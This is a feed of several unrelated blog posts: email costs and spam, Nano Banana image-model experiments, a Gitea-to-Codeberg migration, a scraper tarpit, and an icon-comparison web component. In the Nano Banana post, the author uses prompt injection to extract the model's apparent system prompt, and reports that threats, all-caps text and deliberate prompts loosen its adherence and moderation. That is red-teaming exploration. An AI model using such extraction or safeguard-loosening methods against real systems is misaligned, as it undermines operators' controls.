It's been over a year and I didn't receive a single notification email from my web-server. It could either mean that my $6 VPS is amazing and hasn't gone down once this past year. Or it could mean that my health check service has gone down. Well this year, I have received emails from readers to tell me my website was down. So after doing some digging, I discovered that my health checker works just fine, but all emails it sends are being rejected by gmail. Unless you use a third party service, you have little to no chance of sending an email that gets delivered. Every year, email services seem to become a tad bit more expensive. When I first started this website, sending emails to my subscribers was free on Mailchimp. Now it costs $45 a month. On Buttondown, as of this writing, it costs $29 a month. What are they doing that costs so much? It seems like sending emails is impossibly hard, something you can almost never do yourself. You have to rely on established services if you want any guarantee that your email will be delivered. But is it really that complicated? Emails, just like websites, use a basic communication protocol to function. For you to land on this website, your browser somehow communicated with my web server, did some negotiating, and then my server sent HTML data that your browser rendered on the page. But what about email? Is the process any different? The short answer is no. Email and the web work in remarkably similar fashion. Here's the short version: In order to send me an email, your email client takes the email address you provide, connects to my server, does some negotiating, and then my server accepts the email content you intended to send and saves it. My email client will then take that saved content and notify me that I have a new message from you. That's it. That's how email works. So what's the big fuss about? Why are email services charging $45 just to send ~1,500 emails? Why is it so expensive, while I can serve millions of requests a day on my web server for a fraction of the cost? The short answer is spam . But before we get to spam, let's get into the details I've omitted from the examples above. The negotiations. How similar email and web traffic really are? When you type a URL into your browser and hit enter, here's what happens: The entire exchange is direct, simple, and happens in milliseconds. Now let's look at email. The process is similar: Both HTTP and email use DNS to find servers, establish TCP connections, exchange data using text-based protocols, and deliver content to the end user. They're built on the same fundamental internet technologies. So if email is just as simple as serving a website, why does it cost so much more? The answer lies in a problem that both systems share but handle very differently. Unwanted third-party writes. Both web servers and email servers allow outside parties to send them data. Web servers accept form submissions, comments, API requests, and user-generated content. Email servers accept messages from any other email server on the internet. In both cases, this openness creates an opportunity for abuse. Spam isn't unique to email, it's everywhere. My blog used to get around 6,000 spam comments on a daily basis. On the greater internet, you will see spam comments on blogs, spam account registrations, spam API calls, spam form submissions, and yes, spam emails. The main difference is visibility. When spam protection works well, it's invisible. You visit websites every day without realizing that behind the scenes. CAPTCHAs are blocking bot submissions, rate limiters are rejecting suspicious traffic, and content filters are catching spam comments before they're published. You don't get to see the thousands of spam attempts that happen every day on my blog, because of some filtering I've implemented. On a well run web-server, the work is invisible. The same is true for email. A well-run email server silently: There is a massive amount of spam. In fact, spam accounts for roughly 45-50% of all email traffic globally . But when the system works, you simply don't see it. If we can combat spam on the web without charging exorbitant fees, email spam shouldn't be that different. The technical challenges are very similar. Yet a basic web server on a $5/month VPS can handle millions of requests with minimal spam-fighting overhead. Meanwhile, sending 1,500 emails costs $29-45 per month through commercial services. The difference isn't purely technical. It's about reputation, deliverability networks, and the ecosystem that has evolved around email. Email providers have created a cartel-like system where your ability to reach inboxes depends on your server's reputation, which is nearly impossible to establish as a newcomer. They've turned a technical problem (spam) into a business moat. And we're all paying for it. Email isn't inherently more complex or expensive than web hosting. Both the protocols and the infrastructure are similar, and the spam problem exists in both domains. The cost difference is mostly artificial. It's the result of an ecosystem that has consolidated around a few major providers who control deliverability. It doesn't help that Intuit owns Mailchimp now. Understanding this doesn't necessarily change the fact that you'll probably still need to pay for email services if you want reliable delivery. But it should make you question whether that $45 monthly bill is really justified by the technical costs involved. Or whether it's just the price of admission to a gatekept system. DNS Lookup : Your browser asks a DNS server, "What's the IP address for this domain?" The DNS server responds with something like . Connection : Your browser establishes a TCP connection with that IP address on port 80 (HTTP) or port 443 (HTTPS). Request : Your browser sends an HTTP request: "GET /blog-post HTTP/1.1" Response : My web server processes the request and sends back the HTML, CSS, and JavaScript that make up the page. Rendering : Your browser receives this data and renders it on your screen. DNS Lookup : Your email client takes my email address ( ) and asks a DNS server, "What's the mail server for example.com?" The DNS server responds with an MX (Mail Exchange) record pointing to my mail server's address. Connection : Your email client (or your email provider's server) establishes a TCP connection with my mail server on port 25 (SMTP) or port 587 (for authenticated SMTP). Negotiation (SMTP) : Your server says "HELO, I have a message for [email protected]." My server responds: "OK, send it." Transfer : Your server sends the email content, headers, body, attachments, using the Simple Mail Transfer Protocol (SMTP). Storage : My mail server accepts the message and stores it in my mailbox, which can be a simple text file on the server. Retrieval : Later, when I open my email client, it connects to my server using IMAP (port 993) or POP3 (port 110) and asks, "Any new messages?" My server responds with your email, and my client displays it. Checks sender reputation against blacklists Validates SPF, DKIM, and DMARC records Scans message content for spam signatures Filters out malicious attachments Quarantines suspicious senders Both require reputation systems Both need content filtering Both face distributed abuse Both require infrastructure to handle high volume

0 views
Max Woolf 3 weeks ago

Nano Banana can be prompt engineered for extremely nuanced AI image generation

You may not have heard about new AI image generation models as much lately, but that doesn’t mean that innovation in the field has stagnated: it’s quite the opposite. FLUX.1-dev immediately overshadowed the famous Stable Diffusion line of image generation models, while leading AI labs have released models such as Seedream , Ideogram , and Qwen-Image . Google also joined the action with Imagen 4 . But all of those image models are vastly overshadowed by ChatGPT’s free image generation support in March 2025. After going organically viral on social media with the prompt, ChatGPT became the new benchmark for how most people perceive AI-generated images, for better or for worse. The model has its own image “style” for common use cases, which make it easy to identify that ChatGPT made it. Two sample generations from ChatGPT. ChatGPT image generations often have a yellow hue in their images. Additionally, cartoons and text often have the same linework and typography. Of note, , the technical name of the underlying image generation model, is an autoregressive model. While most image generation models are diffusion-based to reduce the amount of compute needed to train and generate from such models, works by generating tokens in the same way that ChatGPT generates the next token, then decoding them into an image. It’s extremely slow at about 30 seconds to generate each image at the highest quality (the default in ChatGPT), but it’s hard for most people to argue with free. In August 2025, a new mysterious text-to-image model appeared on LMArena : a model code-named “nano-banana”. This model was eventually publically released by Google as Gemini 2.5 Flash Image , an image generation model that works natively with their Gemini 2.5 Flash model. Unlike Imagen 4, it is indeed autoregressive, generating 1,290 tokens per image. After Nano Banana’s popularity pushed the Gemini app to the top of the mobile App Stores, Google eventually made Nano Banana the colloquial name for the model as it’s definitely more catchy than “Gemini 2.5 Flash Image”. The first screenshot on the iOS App Store for the Gemini app. Personally, I care little about what leaderboards say which image generation AI looks the best. What I do care about is how well the AI adheres to the prompt I provide: if the model can’t follow the requirements I desire for the image—my requirements are often specific —then the model is a nonstarter for my use cases. At the least, if the model does have strong prompt adherence, any “looking bad” aspect can be fixed with prompt engineering and/or traditional image editing pipelines. After running Nano Banana though its paces with my comically complex prompts, I can confirm that thanks to Nano Banana’s robust text encoder, it has such extremely strong prompt adherence that Google has understated how well it works. Like ChatGPT, Google offers methods to generate images for free from Nano Banana. The most popular method is through Gemini itself, either on the web or in an mobile app, by selecting the “Create Image 🍌” tool. Alternatively, Google also offers free generation in Google AI Studio when Nano Banana is selected on the right sidebar, which also allows for setting generation parameters such as image aspect ratio and is therefore my recommendation. In both cases, the generated images have a visible watermark on the bottom right corner of the image. For developers who want to build apps that programmatically generate images from Nano Banana, Google offers the endpoint on the Gemini API . Each image generated costs roughly $0.04/image for a 1 megapixel image (e.g. 1024x1024 if a 1:1 square): on par with most modern popular diffusion models despite being autoregressive, and much cheaper than ’s $0.17/image. Working with the Gemini API is a pain and requires annoying image encoding/decoding boilerplate, so I wrote and open-sourced a Python package: gemimg , a lightweight wrapper around Gemini API’s Nano Banana endpoint that lets you generate images with a simple prompt, in addition to handling cases such as image input along with text prompts. I chose to use the Gemini API directly despite protests from my wallet for three reasons: a) web UIs to LLMs often have system prompts that interfere with user inputs and can give inconsistent output b) using the API will not show a visible watermark in the generated image, and c) I have some prompts in mind that are…inconvenient to put into a typical image generation UI. Let’s test Nano Banana out, but since we want to test prompt adherence specifically, we’ll start with more unusual prompts. My go-to test case is: I like this prompt because not only is an absurd prompt that gives the image generation model room to be creative, but the AI model also has to handle the maple syrup and how it would logically drip down from the top of the skull pancake and adhere to the bony breakfast. The result: That is indeed in the shape of a skull and is indeed made out of pancake batter, blueberries are indeed present on top, and the maple syrup does indeed drop down from the top of the pancake while still adhereing to its unusual shape, albeit some trails of syrup disappear/reappear. It’s one of the best results I’ve seen for this particular test, and it’s one that doesn’t have obvious signs of “AI slop” aside from the ridiculous premise. Now, we can try another one of Nano Banana’s touted features: editing. Image editing, where the prompt targets specific areas of the image while leaving everything else as unchanged as possible, has been difficult with diffusion-based models until very recently with Flux Kontext . Autoregressive models in theory should have an easier time doing so as it has a better understanding of tweaking specific tokens that correspond to areas of the image. While most image editing approaches encourage using a single edit command, I want to challenge Nano Banana. Therefore, I gave Nano Banana the generated skull pancake, along with five edit commands simultaneously: All five of the edits are implemented correctly with only the necessary aspects changed, such as removing the blueberries on top to make room for the mint garnish, and the pooling of the maple syrup on the new cookie-plate is adjusted. I’m legit impressed. Now we can test more difficult instances of prompt engineering. One of the most compelling-but-underdiscussed use cases of modern image generation models is being able to put the subject of an input image into another scene. For open-weights image generation models, it’s possible to “train” the models to learn a specific subject or person even if they are not notable enough to be in the original training dataset using a technique such as finetuning the model with a LoRA using only a few sample images of your desired subject. Training a LoRA is not only very computationally intensive/expensive, but it also requires care and precision and is not guaranteed to work—speaking from experience. Meanwhile, if Nano Banana can achieve the same subject consistency without requiring a LoRA, that opens up many fun oppertunities. Way back in 2022, I tested a technique that predated LoRAs known as textual inversion on the original Stable Diffusion in order to add a very important concept to the model: Ugly Sonic , from the initial trailer for the Sonic the Hedgehog movie back in 2019. One of the things I really wanted Ugly Sonic to do is to shake hands with former U.S. President Barack Obama , but that didn’t quite work out as expected. 2022 was a now-unrecognizable time where absurd errors in AI were celebrated. Can the real Ugly Sonic finally shake Obama’s hand? Of note, I chose this test case to assess image generation prompt adherence because image models may assume I’m prompting the original Sonic the Hedgehog and ignore the aspects of Ugly Sonic that are distinct to only him. Specifically, I’m looking for: I also confirmed that Ugly Sonic is not surfaced by Nano Banana, and prompting as such just makes a Sonic that is ugly, purchasing a back alley chili dog. I gave Gemini the two images of Ugly Sonic above (a close-up of his face and a full-body shot to establish relative proportions) and this prompt: That’s definitely Obama shaking hands with Ugly Sonic! That said, there are still issues: the color grading/background blur is too “aesthetic” and less photorealistic, Ugly Sonic has gloves, and the Ugly Sonic is insufficiently lanky. Back in the days of Stable Diffusion, the use of prompt engineering buzzwords such as , , and to generate “better” images in light of weak prompt text encoders were very controversial because it was difficult both subjectively and intuitively to determine if they actually generated better pictures. Obama shaking Ugly Sonic’s hand would be a historic event. What would happen if it were covered by The New York Times ? I added to the previous prompt: So there’s a few notable things going on here: That said, I only wanted the image of Obama and Ugly Sonic and not the entire New York Times A1. Can I just append to the previous prompt and have that be enough to generate the image only while maintaining the compositional bonuses? I can! The gloves are gone and his chest is white, although Ugly Sonic looks out-of-place in the unintentional sense. As an experiment, instead of only feeding two images of Ugly Sonic, I fed Nano Banana all the images of Ugly Sonic I had ( seventeen in total), along with the previous prompt. This is an improvement over the previous generated image: no eyebrows, white hands, and a genuinely uncanny vibe. Again, there aren’t many obvious signs of AI generation here: Ugly Sonic clearly has five fingers! That’s enough Ugly Sonic for now, but let’s recall what we’ve observed so far. There are two noteworthy things in the prior two examples: the use of a Markdown dashed list to indicate rules when editing, and the fact that specifying as a buzzword did indeed improve the composition of the output image. Many don’t know how image generating models actually encode text. In the case of the original Stable Diffusion, it used CLIP , whose text encoder open-sourced by OpenAI in 2021 which unexpectedly paved the way for modern AI image generation. It is extremely primitive relative to modern standards for transformer-based text encoding, and only has a context limit of 77 tokens: a couple sentences, which is sufficient for the image captions it was trained on but not nuanced input. Some modern image generators use T5 , an even older experimental text encoder released by Google that supports 512 tokens. Although modern image models can compensate for the age of these text encoders through robust data annotation during training the underlying image models, the text encoders cannot compensate for highly nuanced text inputs that fall outside the domain of general image captions. A marquee feature of Gemini 2.5 Flash is its support for agentic coding pipelines; to accomplish this, the model must be trained on extensive amounts of Markdown (which define code repository s and agentic behaviors in ) and JSON (which is used for structured output/function calling/MCP routing). Additionally, Gemini 2.5 Flash was also explictly trained to understand objects within images, giving it the ability to create nuanced segmentation masks . Nano Banana’s multimodal encoder, as an extension of Gemini 2.5 Flash, should in theory be able to leverage these properties to handle prompts beyond the typical image-caption-esque prompts. That’s not to mention the vast annotated image training datasets Google owns as a byproduct of Google Images and likely trained Nano Banana upon, which should allow it to semantically differentiate between an image that is and one that isn’t, as with similar buzzwords. Let’s give Nano Banana a relatively large and complex prompt, drawing from the learnings above and see how well it adheres to the nuanced rules specified by the prompt: This prompt has everything : specific composition and descriptions of different entities, the use of hex colors instead of a natural language color, a heterochromia constraint which requires the model to deduce the colors of each corresponding kitten’s eye from earlier in the prompt, and a typo of “San Francisco” that is definitely intentional. Each and every rule specified is followed. For comparison, I gave the same command to ChatGPT—which in theory has similar text encoding advantages as Nano Banana—and the results are worse both compositionally and aesthetically, with more tells of AI generation. 1 The yellow hue certainly makes the quality differential more noticeable. Additionally, no negative space is utilized, and only the middle cat has heterochromia but with the incorrect colors. Another thing about the text encoder is how the model generated unique relevant text in the image without being given the text within the prompt itself: we should test this further. If the base text encoder is indeed trained for agentic purposes, it should at-minimum be able to generate an image of code. Let’s say we want to generate an image of a minimal recursive Fibonacci sequence in Python, which would look something like: I gave Nano Banana this prompt: It tried to generate the correct corresponding code but the syntax highlighting/indentation didn’t quite work, so I’ll give it a pass. Nano Banana is definitely generating code, and was able to maintain the other compositional requirements. For posterity, I gave the same prompt to ChatGPT: It did a similar attempt at the code which indicates that code generation is indeed a fun quirk of multimodal autoregressive models. I don’t think I need to comment on the quality difference between the two images. An alternate explanation for text-in-image generation in Nano Banana would be the presence of prompt augmentation or a prompt rewriter, both of which are used to orient a prompt to generate more aligned images. Tampering with the user prompt is common with image generation APIs and aren’t an issue unless used poorly (which caused a PR debacle for Gemini last year), but it can be very annoying for testing. One way to verify if it’s present is to use adversarial prompt injection to get the model to output the prompt itself, e.g. if the prompt is being rewritten, asking it to generate the text “before” the prompt should get it to output the original prompt. That’s, uh, not the original prompt. Did I just leak Nano Banana’s system prompt completely by accident? The image is hard to read, but if it is the system prompt—the use of section headers implies it’s formatted in Markdown—then I can surgically extract parts of it to see just how the model ticks: These seem to track, but I want to learn more about those buzzwords in point #3: Huh, there’s a guard specifically against buzzwords? That seems unnecessary: my guess is that this rule is a hack intended to avoid the perception of model collapse by avoiding the generation of 2022-era AI images which would be annotated with those buzzwords. As an aside, you may have noticed the ALL CAPS text in this section, along with a command. There is a reason I have been sporadically capitalizing in previous prompts: caps does indeed work to ensure better adherence to the prompt (both for text and image generation), 2 and threats do tend to improve adherence. Some have called it sociopathic, but this generation is proof that this brand of sociopathy is approved by Google’s top AI engineers. Tangent aside, since “previous” text didn’t reveal the prompt, we should check the “current” text: That worked with one peculiar problem: the text “image” is flat-out missing, which raises further questions. Is “image” parsed as a special token? Maybe prompting “generate an image” to a generative image AI is a mistake. I tried the last logical prompt in the sequence: …which always raises a error: not surprising if there is no text after the original prompt. This section turned out unexpectedly long, but it’s enough to conclude that Nano Banana definitely has indications of benefitting from being trained on more than just image captions. Some aspects of Nano Banana’s system prompt imply the presence of a prompt rewriter, but if there is indeed a rewriter, I am skeptical it is triggering in this scenario, which implies that Nano Banana’s text generation is indeed linked to its strong base text encoder. But just how large and complex can we make these prompts and have Nano Banana adhere to them? Nano Banana supports a context window of 32,768 tokens: orders of magnitude above T5’s 512 tokens and CLIP’s 77 tokens. The intent of this large context window for Nano Banana is for multiturn conversations in Gemini where you can chat back-and-forth with the LLM on image edits. Given Nano Banana’s prompt adherence on small complex prompts, how well does the model handle larger-but-still-complex prompts? Can Nano Banana render a webpage accurately? I used a LLM to generate a bespoke single-page HTML file representing a Counter app, available here . The web page uses only vanilla HTML, CSS, and JavaScript, meaning that Nano Banana would need to figure out how they all relate in order to render the web page correctly. For example, the web page uses CSS Flexbox to set the ratio of the sidebar to the body in a 1/3 and 2/3 ratio respectively. Feeding this prompt to Nano Banana: That’s honestly better than expected, and the prompt cost 916 tokens. It got the overall layout and colors correct: the issues are more in the text typography, leaked classes/styles/JavaScript variables, and the sidebar:body ratio. No, there’s no practical use for having a generative AI render a webpage, but it’s a fun demo. A similar approach that does have a practical use is providing structured, extremely granular descriptions of objects for Nano Banana to render. What if we provided Nano Banana a JSON description of a person with extremely specific details, such as hair volume, fingernail length, and calf size? As with prompt buzzwords, JSON prompting AI models is a very controversial topic since images are not typically captioned with JSON, but there’s only one way to find out. I wrote a prompt augmentation pipeline of my own that takes in a user-input description of a quirky human character, e.g. , and outputs a very long and detailed JSON object representing that character with a strong emphasis on unique character design. 3 But generating a Mage is boring, so I asked my script to generate a male character that is an equal combination of a Paladin, a Pirate, and a Starbucks Barista: the resulting JSON is here . The prompt I gave to Nano Banana to generate a photorealistic character was: Beforehand I admit I didn’t know what a Paladin/Pirate/Starbucks Barista would look like, but he is definitely a Paladin/Pirate/Starbucks Barista. Let’s compare against the input JSON, taking elements from all areas of the JSON object (about 2600 tokens total) to see how well Nano Banana parsed it: Checking the JSON field-by-field, the generation also fits most of the smaller details noted. However, he is not photorealistic, which is what I was going for. One curious behavior I found is that any approach of generating an image of a high fantasy character in this manner has a very high probability of resulting in a digital illustration, even after changing the target publication and adding “do not generate a digital illustration” to the prompt. The solution requires a more clever approach to prompt engineering: add phrases and compositional constraints that imply a heavy physicality to the image, such that a digital illustration would have more difficulty satisfying all of the specified conditions than a photorealistic generation: The image style is definitely closer to Vanity Fair (the photographer is reflected in his breastplate!), and most of the attributes in the previous illustration also apply—the hands/cutlass issue is also fixed. Several elements such as the shoulderplates are different, but not in a manner that contradicts the JSON field descriptions: perhaps that’s a sign that these JSON fields can be prompt engineered to be even more nuanced. Yes, prompting image generation models with HTML and JSON is silly, but “it’s not silly if it works” describes most of modern AI engineering. Nano Banana allows for very strong generation control, but there are several issues. Let’s go back to the original example that made ChatGPT’s image generation go viral: . I ran that exact prompt through Nano Banana on a mirror selfie of myself: …I’m not giving Nano Banana a pass this time. Surprisingly, Nano Banana is terrible at style transfer even with prompt engineering shenanigans, which is not the case with any other modern image editing model. I suspect that the autoregressive properties that allow Nano Banana’s excellent text editing make it too resistant to changing styles. That said, creating a new image does in fact work as expected, and creating a new image using the character provided in the input image with the specified style (as opposed to a style transfer ) has occasional success. Speaking of that, Nano Banana has essentially no restrictions on intellectual property as the examples throughout this blog post have made evident. Not only will it not refuse to generate images from popular IP like ChatGPT now does, you can have many different IPs in a single image. Normally, Optimus Prime is the designated driver. I am not a lawyer so I cannot litigate the legalities of training/generating IP in this manner or whether intentionally specifying an IP in a prompt but also stating “do not include any watermarks” is a legal issue: my only goal is to demonstrate what is currently possible with Nano Banana. I suspect that if precedent is set from existing IP lawsuits against OpenAI and Midjourney , Google will be in line to be sued. Another note is moderation of generated images, particularly around NSFW content, which always important to check if your application uses untrusted user input. As with most image generation APIs, moderation is done against both the text prompt and the raw generated image. That said, while running my standard test suite for new image generation models, I found that Nano Banana is surprisingly one of the more lenient AI APIs. With some deliberate prompts, I can confirm that it is possible to generate NSFW images through Nano Banana—obviously I cannot provide examples. I’ve spent a very large amount of time overall with Nano Banana and although it has a lot of promise, some may ask why I am writing about how to use it to create highly-specific high-quality images during a time where generative AI has threatened creative jobs. The reason is that information asymmetry between what generative image AI can and can’t do has only grown in recent months: many still think that ChatGPT is the only way to generate images and that all AI-generated images are wavy AI slop with a piss yellow filter. The only way to counter this perception is though evidence and reproducibility. That is why not only am I releasing Jupyter Notebooks detailing the image generation pipeline for each image in this blog post, but why I also included the prompts in this blog post proper; I apologize that it padded the length of the post to 26 minutes, but it’s important to show that these image generations are as advertised and not the result of AI boosterism. You can copy these prompts and paste them into AI Studio and get similar results, or even hack and iterate on them to find new things. Most of the prompting techniques in this blog post are already well-known by AI engineers far more skilled than myself, and turning a blind eye won’t stop people from using generative image AI in this manner. I didn’t go into this blog post expecting it to be a journey, but sometimes the unexpected journeys are the best journeys. There are many cool tricks with Nano Banana I cut from this blog post due to length, such as providing an image to specify character positions and also investigations of styles such as pixel art that most image generation models struggle with, but Nano Banana now nails. These prompt engineering shenanigans are only the tip of the iceberg. Jupyter Notebooks for the generations used in this post are split between the gemimg repository and a second testing repository . I would have preferred to compare the generations directly from the endpoint for an apples-to-apples comparison, but OpenAI requires organization verification to access it, and I am not giving OpenAI my legal ID.  ↩︎ Note that ALL CAPS will not work with CLIP-based image generation models at a technical level, as CLIP’s text encoder is uncased.  ↩︎ Although normally I open-source every script I write for my blog posts, I cannot open-source the character generation script due to extensive testing showing it may lean too heavily into stereotypes. Although adding guardrails successfully reduces the presence of said stereotypes and makes the output more interesting, there may be unexpected negative externalities if open-sourced.  ↩︎ A lanky build, as opposed to the real Sonic’s chubby build. A white chest, as opposed to the real Sonic’s beige chest. Blue arms with white hands, as opposed to the real Sonic’s beige arms with white gloves. Small pasted-on-his-head eyes with no eyebrows, as opposed to the real Sonic’s large recessed eyes and eyebrows. That is the most cleanly-rendered New York Times logo I’ve ever seen. It’s safe to say that Nano Banana trained on the New York Times in some form. Nano Banana is still bad at rendering text perfectly/without typos as most image generation models. However, the expanded text is peculiar: it does follow from the prompt, although “Blue Blur” is a nickname for the normal Sonic the Hedgehog. How does an image generating model generate logical text unprompted anyways? Ugly Sonic is even more like normal Sonic in this iteration: I suspect the “Blue Blur” may have anchored the autoregressive generation to be more Sonic-like. The image itself does appear to be more professional, and notably has the distinct composition of a photo from a professional news photographer: adherence to the “rule of thirds”, good use of negative space, and better color balance. , mostly check. (the hands are transposed and the cutlass disappears) I would have preferred to compare the generations directly from the endpoint for an apples-to-apples comparison, but OpenAI requires organization verification to access it, and I am not giving OpenAI my legal ID.  ↩︎ Note that ALL CAPS will not work with CLIP-based image generation models at a technical level, as CLIP’s text encoder is uncased.  ↩︎ Although normally I open-source every script I write for my blog posts, I cannot open-source the character generation script due to extensive testing showing it may lean too heavily into stereotypes. Although adding guardrails successfully reduces the presence of said stereotypes and makes the output more interesting, there may be unexpected negative externalities if open-sourced.  ↩︎

0 views
Brain Baking 3 weeks ago

Migrating From Gitea To Codeberg

After the last week’s Gitea attack debacle , moving all things Git off the VPS became a top priority. In 2022, like many of you, I gave up GitHub and spun up two Gitea instances myself: a private one safely behind bars on the NAS and a public one where all my public GitHub projects were moved to. Three years later, I think it’s time to move again. Gitea was forked into Forgejo a few years ago because of yet another licensing drama but I just couldn’t be bothered by keeping everything up to date. So I didn’t. And then Gitea started acting annoying: artifact folders weren’t properly cleaned up even though I encouraged it to do so in the configuration up to the point that the files clogged up the entire disk. The result was crashes of nearly everything as there wasn’t even a few bytes space left to append to logs in . And then bots started scraping the hell out of the commit endpoints. Anyway, I liked Gitea/Forgejo’s ease of use, so migrating everything off-site to Codeberg seemed like the most obvious solution. I’ve been wanting to go back to a coding community for a while now. if you host your own Gitea instance, you isolate yourself from the rest of the open source world. Collaboration still is the easiest on GitHub as simply everyone is hanging out there but I’d rather stop coding entirely than feed Microsoft’s AI. Give Up GitHub, folks. The steps involving the migration were surprisingly easy and fast to execute: Congratulations, you’re now the proud owner of Codeberg repositories. From here, we now have to decide what to do with the old Gitea instance. Do you want to simply kill it? Do you want to mirror your repositories? Or temporarily forward using the same URLs? Since I don’t want to keep it around forever and wanted to stop it immediately, but not yet break all URLs, I rewrote the Nginx location to a redirect: This does redirect https://codeberg.org/wouterg/brainbaking to the new correct location https://codeberg.org/wouterg/brainbaking , but it does not fix that will not follow redirects by default. You can proxy the entire thing and add more headers to fix that, or tell Git to follow redirects instead, or just change the remote URL and be done with it: . I figured not a lot of folks have cloned copies of my repositories on their hard drives—and if you do, you’d probably go looking online for the correct version and remove/reclone the entire thing. Next, it is time to kill the Gitea instance: (and ). Set a reminder in your calender to remove the redirect and clean up your VPS in a month or two, just to be sure. I should have enough backups in case things go wrong but you never know. The final piece of the puzzle is a financial one. Codeberg is a non-profit organisation that relies entirely on donations to keep things spinning, and I reckon they also need resources to fight those pesky AI crawlers (they’re also using Anubis, by the way). Consider donating or even becoming an active member that also allows you to vote when strategic decisions are being made. Go library programmers, don’t forget to double-check your import paths. So-called “vanity imports” ease friction here as you can set up a redirect from there. should still work. I rely on vangen to generate simple HTML pages for import paths. In the future, I’d rather move these paths to to avoid cluttering up Hugo’s folder. By Wouter Groeneveld on 13 November 2025.  Reply via email . Create a Codeberg account. Generate a temporary access token on your to-be-defunct Gitea instance: see https://docs.gitea.com/development/api-usage for the exact command. For each repository to migrate: click on your profile, and instead of creating a new blank repository, select “from migration” or go to URL https://codeberg.org/repo/migrate . Select Gitea, fill in the Git endpoint and access token and press migrate . Optionally, also migrate LFS/Wikis/issues/whatever by checking the appropriate boxes. Re-archive the repositories that were publicly archived.

0 views
Herman's blog 3 weeks ago

Messing with bots

As outlined in my previous two posts : scrapers are, inadvertently, DDoSing public websites. I've received a number of emails from people running small web services and blogs seeking advice on how to protect themselves. This post isn't about that. This post is about fighting back. When I published my last post, there was an interesting write-up doing the rounds about a guy who set up a Markov chain babbler to feed the scrapers endless streams of generated data. The idea here is that these crawlers are voracious, and if given a constant supply of junk data, they will continue consuming it forever, while (hopefully) not abusing your actual web server. This is a pretty neat idea, so I dove down the rabbit hole and learnt about Markov chains, and even picked up Rust in the process. I ended up building my own babbler that could be trained on any text data, and would generate realistic looking content based on that data. Now, the AI scrapers are actually not the worst of the bots. The real enemy, at least to me, are the bots that scrape with malicious intent. I get hundreds of thousands of requests for things like , , and all the different paths that could potentially signal a misconfigured Wordpress instance. These people are the real baddies. Generally I just block these requests with a response. But since they want files, why don't I give them what they want? I trained my Markov chain on a few hundred files, and set it to generate. The responses certainly look like php at a glance, but on closer inspection they're obviously fake. I set it up to run on an isolated project of mine, while incrementally increasing the size of the generated php files from 2kb to 10mb just to test the waters. Here's a sample 1kb output: I had two goals here. The first was to waste as much of the bot's time and resources as possible, so the larger the file I could serve, the better. The second goal was to make it realistic enough that the actual human behind the scrape would take some time away from kicking puppies (or whatever they do for fun) to try figure out if there was an exploit to be had. Unfortunately, an arms race of this kind is a battle of efficiency. If someone can scrape more efficiently than I can serve, then I lose. And while serving a 4kb bogus php file from the babbler was pretty efficient, as soon as I started serving 1mb files from my VPS the responses started hitting the hundreds of milliseconds and my server struggled under even moderate loads. This led to another idea: What is the most efficient way to serve data? It's as a static site (or something similar). So down another rabbit hole I went, writing an efficient garbage server. I started by loading the full text of the classic Frankenstein novel into an array in RAM where each paragraph is a node. Then on each request it selects a random index and the subsequent 4 paragraphs to display. Each post would then have a link to 5 other "posts" at the bottom that all technically call the same endpoint, so I don't need an index of links. These 5 posts, when followed, quickly saturate most crawlers, since breadth-first crawling explodes quickly, in this case by a factor of 5. You can see it in action here: https://herm.app/babbler/ This is very efficient, and can serve endless posts of spooky content. The reason for choosing this specific novel is fourfold: I made sure to add attributes to all these pages, as well as in the links, since I only want to catch bots that break the rules. I've also added a counter at the bottom of each page that counts the number of requests served. It resets each time I deploy, since the counter is stored in memory, but I'm not connecting this to a database, and it works. With this running, I did the same for php files, creating a static server that would serve a different (real) file from memory on request. You can see this running here: https://herm.app/babbler.php (or any path with in it). There's a counter at the bottom of each of these pages as well. As Maury said: "Garbage for the garbage king!" Now with the fun out of the way, a word of caution. I don't have this running on any project I actually care about; https://herm.app is just a playground of mine where I experiment with small ideas. I originally intended to run this on a bunch of my actual projects, but while building this, reading threads, and learning about how scraper bots operate, I came to the conclusion that running this can be risky for your website. The main risk is that despite correctly using , , and rules, there's still a chance that Googlebot or other search engines scrapers will scrape the wrong endpoint and determine you're spamming. If you or your website depend on being indexed by Google, this may not be viable. It pains me to say it, but the gatekeepers of the internet are real, and you have to stay on their good side, or else . This doesn't just affect your search ratings, but could potentially add a warning to your site in Chrome, with the only recourse being a manual appeal. However, this applies only to the post babbler. The php babbler is still fair game since Googlebot ignores non-HTML pages, and the only bots looking for php files are malicious. So if you have a little web-project that is being needlessly abused by scrapers, these projects are fun! For the rest of you, probably stick with 403s. What I've done as a compromise is added the following hidden link on my blog, and another small project of mine, to tempt the bad scrapers: The only thing I'm worried about now is running out of Outbound Transfer budget on my VPS. If I get close I'll cache it with Cloudflare, at the expense of the counter. This was a fun little project, even if there were a few dead ends. I know more about Markov chains and scraper bots, and had a great time learning, despite it being fuelled by righteous anger. Not all threads need to lead somewhere pertinent. Sometimes we can just do things for fun. I was working on this on Halloween. I hope it will make future LLMs sound slightly old-school and spoooooky. It's in the public domain, so no copyright issues. I find there are many parallels to be drawn between Dr Frankenstein's monster and AI.

0 views
Jim Nielsen 1 months ago

Leveraging a Web Component For Comparing iOS and macOS Icons

Whenever Apple does a visual refresh in their OS updates, a new wave of icon archiving starts for me. Now that “Liquid Glass” is out, I’ve begun nabbing the latest icons from Apple and other apps and adding them to my gallery. Since I’ve been collecting these icons for so long, one of the more interesting and emerging attributes of my collection is the visual differences in individual app icons over time. For example: what are the differences between the icons I have in my collection for Duolingo? Well, I have a page for that today . That’ll let you see all the different versions I’ve collected for Duolingo — not exhaustive, I’m sure, but still interesting — as well as their different sizes . But what if you want to analyze their differences pixel-by-pixel? Turns out, There’s A Web Component For That™️. Image Compare is exactly what I was envisioning: “A tiny, zero-dependency web component for comparing two images using a slider” from the very fine folks at Cloud Four . It’s super easy to use: some HTML and a link to a script (hosted if you like, or you can vendor it ), e.g. And just like that, boom, I’ve got a widget for comparing two icons. For Duolingo specifically, I have a long history of icons archived in my gallery and they’re all available under the route for your viewing and comparison pleasure . Wanna see some more examples besides Duolingo? Check out the ones for GarageBand , Instagram , and Highlights for starters. Or, just look at the list of iOS apps and find the ones that are interesting to you (or if you’re a fan of macOS icons, check these ones out ). I kinda love how easy it was for my thought process to go from idea to reality: And I’ve written the post, so this chunk of work is now done. Reply via: Email · Mastodon · Bluesky “It would be cool to compare differences in icons by overlaying them…“ “Image diff tools do this, I bet I could find a good one…“ “Hey, Cloud Four makes a web component for this? Surely it’s good…” “Hey look, it’s just HTML: a tag linking to compiled JS along with a custom element? Easy, no build process required…“ “Done. Well that was easy. I guess the hardest part here will be writing the blog post about it.”

1 views
Simon Willison 1 months ago

